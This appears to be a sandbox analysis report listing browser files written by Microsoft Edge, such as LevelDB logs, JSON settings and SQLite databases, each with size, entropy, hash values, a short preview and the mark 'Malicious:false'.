                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.529 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:01:21.533 195c Recovering log #3.2024/12/27-01:01:21.533 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.173926215228176
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XmTD+q2P923oH+Tcwt865IFUt8U4XQWZmw+U4XnVkwO923oH+Tcwt86+ULJ:BtTD+v4Yeb/WFUt8UvW/+UqV5LYeb/+e
                                                                                                                                                                                                                                                                                                  MD5:0F7FCC1F18748D23B44E42A046981DB9
                                                                                                                                                                                                                                                                                                  SHA1:55B6F02CF98BC9E6ACAFDD36F4CF961B31D62C63
                                                                                                                                                                                                                                                                                                  SHA-256:7D447CEB690487A4D2B23FC6093EAADA148B619D2D169DBF387A5C7DC7B55356
                                                                                                                                                                                                                                                                                                  SHA-512:C9FD5054F0D422A93058A889804E966FE67658F78F75E4CB5A1FA4E9EFAD5417B0464F93C32FEA3C9AE0347C033B299A6B49AAA486D5C3BC0B8EC1A430995753
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.538 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:01:21.539 195c Recovering log #3.2024/12/27-01:01:21.539 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0887016879249325
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X/SE9+q2P923oH+Tcwt8NIFUt8U4XXWZmw+U4XUVkwO923oH+Tcwt8+eLJ:BcSi+v4YebpFUt8UiW/+U3V5LYebqJ
                                                                                                                                                                                                                                                                                                  MD5:B049F756F5F38C066F339051889C26C0
                                                                                                                                                                                                                                                                                                  SHA1:2F23C58F91ED7E98BC86A71502547EB2C48775BE
                                                                                                                                                                                                                                                                                                  SHA-256:AC738EBE6935E6520986314CCAA74C7CDD2DF54C54291D7DEDCBEA3D488B1191
                                                                                                                                                                                                                                                                                                  SHA-512:F71DB20EAB364CC4C2919E09582CC5631A89A66F2EDCF7F9FC489493C68671F4CF55D8DF521CF88D5E5CA11A66F93838934CD797F023FA3EDFC3A8B22EEE27BD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.323 4cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:01:22.324 4cc Recovering log #3.2024/12/27-01:01:22.326 4cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6480765067883114
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0tcAjl+QkQerDP/Kbt+773pL9hCgam6ItRKToaAu:adTKl+e2DP/P7Pv9RKcC
                                                                                                                                                                                                                                                                                                  MD5:206D5391A36486D9E39C96DC9C6995AB
                                                                                                                                                                                                                                                                                                  SHA1:0D3ECF912D29427827B87521F9010AF7E2D84EF0
                                                                                                                                                                                                                                                                                                  SHA-256:CE70C08E22AFBECDF3D344FCC276BEDA4A4CA9B8C1EAF8DCA15CB663943F7B6F
                                                                                                                                                                                                                                                                                                  SHA-512:26AE30E175400A8921499A5B76D4A402B8CBC014BE48BE68D79230380C579657C3FBFC2A550ECF391EAC64672FF83FEB577FA30C5F33DF1C256B5A271F71EDF1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.256829450949075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:BiFxv4Yeb8rcHEZrELFUt8UG/+U65LYeb8rcHEZrEZSJ:84Yeb8nZrExg8yLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                  MD5:F04CAFD51C2D563458527CED08264EB7
                                                                                                                                                                                                                                                                                                  SHA1:7CD7C977689AA5C9FE167196EB00814C7384B64B
                                                                                                                                                                                                                                                                                                  SHA-256:999948F9E865ED16E809814F5668BBA929F326A63F5B945BD19E1CBD329B7105
                                                                                                                                                                                                                                                                                                  SHA-512:BB4AC006AC03032DD5AB47C2F2CA8571C43FB3A983DA0810F734683017CFF1E797102F9D03450F941951ACF17D10F9E35BF1E229735B457BA3CBA19738F5ACDD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:25.476 1574 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:01:25.477 1574 Recovering log #3.2024/12/27-01:01:25.477 1574 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1039
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.59605785651415
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:DZWul4OaOTeSfJrXZMWpV03y1x4ghaji0MyG:DZz3aO1rXZbpV03Sx4kajWyG
                                                                                                                                                                                                                                                                                                  MD5:BD0CD5C23997AC0F985557A169B68B3A
                                                                                                                                                                                                                                                                                                  SHA1:B2E8052722D73617961290514F90AF1B4072C2AC
                                                                                                                                                                                                                                                                                                  SHA-256:AE72AD53FE47AED2B2FC27A04FA89DEE70F0F6A6E676C9CF71BA97CE51CFD98E
                                                                                                                                                                                                                                                                                                  SHA-512:3FD35A6B230C23EAD3EB7089DAE19ECFAEDAB7E628AC6D43598BD40005E974D6C7AD1099FDB93857638B3887348B57C6C1C206FFA3E345ECDAD01409CCE1150D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.sD..................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1735279296236.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735279297430.._https://ntp.msn.com..MUID!.3918B198F66063F3328CA4FAF7676296.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735279296326,"schedule":[-1,4,9,-1,-1,-1,40],"scheduleFixed":[-1,4,9,-1,-1,-1,40],"simpleSchedule":[23,22,10,31,32,34,48]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735279296205.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Fri Dec 27 2024 01:01:35 GMT-0500 (Eastern Standard T
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.109217395386144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XnAVq2P923oH+Tcwt8a2jMGIFUt8U4XHNAgZmw+U4XxAIkwO923oH+Tcwt8a23:BNv4Yeb8EFUt8UqX/+UC5LYeb8bJ
                                                                                                                                                                                                                                                                                                  MD5:39B8708445FC909B23ED9718FFF73D6A
                                                                                                                                                                                                                                                                                                  SHA1:0FDC142B5C7693892AF2405E215483FD2C1533CB
                                                                                                                                                                                                                                                                                                  SHA-256:17071D358DF799887BD92130590EA4A4DB7A7EF82AECF68DC5BAD868A01463A8
                                                                                                                                                                                                                                                                                                  SHA-512:4E98E1943B0C0D1258091962552B9D6270928D6998C0B8D2C9CDA02093B9739145D8516921309EBAF162CB673531B827872D531876EA7EC7339B77F2854B31CD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.560 14d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:01:22.562 14d0 Recovering log #3.2024/12/27-01:01:22.566 14d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7866249405793737
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:tTnrqKaBn3sx9GOAvR2nTBJXcf0L/ZJVb:Vnrq5h3sTGOAoXI0LhJVb
                                                                                                                                                                                                                                                                                                  MD5:C6001E8500F35156AAE0375203C3BEC8
                                                                                                                                                                                                                                                                                                  SHA1:75B95CC8A12A6BD5F9F45B7FF00873A6FD75EA4F
                                                                                                                                                                                                                                                                                                  SHA-256:5B0518B52CC024186C2A6F6D8D156FD4BCCFD639B0022CF53A9456F647A4AB92
                                                                                                                                                                                                                                                                                                  SHA-512:61A4D8628867F414CF01B205091969C4BC8B470ED24F4D65DED563E595FBD239AAF9CDB739FADC5C03C72E540A38699E61EB72DAB1881146B7AAC6733BEE1080
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                                  MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                                  SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                                  SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                                  SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2146087032542026
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBRWN:eIEumQv8m1ccnvS6dq+6bL3v
                                                                                                                                                                                                                                                                                                  MD5:F8B43DBC77B3194A57600E863AE10798
                                                                                                                                                                                                                                                                                                  SHA1:C1841CE427481827F74E3D4031F5A796B5A86CEA
                                                                                                                                                                                                                                                                                                  SHA-256:4C02829C23905AB505E8C435B296922EF4E644A47D5353A2D495146F682C463D
                                                                                                                                                                                                                                                                                                  SHA-512:BAB881EC9EC4645BE7668B374D79C08A3C2016129382C7AEBEF0E02BC1F9A1724314D194EAB72F63692A1A211E2AD5F9FE9F95BA2E1AA4182680CF50475FB1B3
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                                  MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                                  SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                                  SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                                  SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                                  Malicious:false
